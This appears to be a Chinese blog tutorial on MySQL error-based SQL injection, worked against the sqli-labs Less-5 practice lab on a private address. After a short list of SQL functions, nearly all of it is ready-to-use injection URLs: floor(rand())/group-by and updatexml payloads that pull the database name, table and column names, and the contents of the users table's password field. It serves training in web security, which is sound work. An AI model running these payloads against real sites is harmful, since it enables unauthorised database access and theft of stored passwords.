0
点赞
收藏
分享

微信扫一扫

Mysql注入 -- 报错注入


时刻清零,不要老把自己的一套拿出来。。。

----  网易云热评

一、常用函数

1、count();统计该列有几条数据

2、rand():产生0-1随机数

Mysql注入 -- 报错注入_报错注入

3、group by:根据某一列排序,改列必须出现在前面查询的内容

Mysql注入 -- 报错注入_报错注入_02

4、floor(1.23):获取小于等于该值的最大整数

5、as:给查询的列名内容重命名

6、concat(1,2,3):将里面的内容连接在一起

Mysql注入 -- 报错注入_Less_03

二、实例演示

1、获取当前数据库名称

http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select database()),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+

Mysql注入 -- 报错注入_sql_04

2、获取数据库security的表名

http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+  第一个表
http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 3,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables group by aiyou --+ 第三个表

Mysql注入 -- 报错注入_Mysql_05

3、获取表users的字段名,将user转为十六进制,引号带入会引发语句错误

http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 1,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+ 第二列username
http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 2,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables group by aiyou --+ 第三列password

Mysql注入 -- 报错注入_sql_06

4、获取字段password的内容

http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select password from users limit 0,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+ 第一个内容
http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select password from users limit 1,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables group by aiyou --+ 第二个内容

Mysql注入 -- 报错注入_Mysql_07

三、函数报错

1、updatexml:updatexml的第二个参数需要Xpath格式的字符串,concat()函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了

2、获取数据库名称

http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select database()),0x2a,0x2a),1)) --+

Mysql注入 -- 报错注入_Mysql_08

3、获取数据库security的表名

http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x2a,0x2a),1)) --+
http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x2a,0x2a),1)) --+

Mysql注入 -- 报错注入_报错注入_09

4、获取表users的字段名,将user转为十六进制,引号带入会引发语句错误

http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 1,1),0x2a,0x2a),1)) --+
http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 2,1),0x2a,0x2a),1)) --+

Mysql注入 -- 报错注入_Less_10

5、获取字段password的内容

http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select password from users limit 0,1),0x2a,0x2a),1)) --+
http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select password from users limit 3,1),0x2a,0x2a),1)) --+

Mysql注入 -- 报错注入_sql_11

 

禁止非法,后果自负

欢迎关注视频号:之乎者也吧

Mysql注入 -- 报错注入_Less_12


Mysql注入 -- 报错注入_Less_13

举报

相关推荐

0 条评论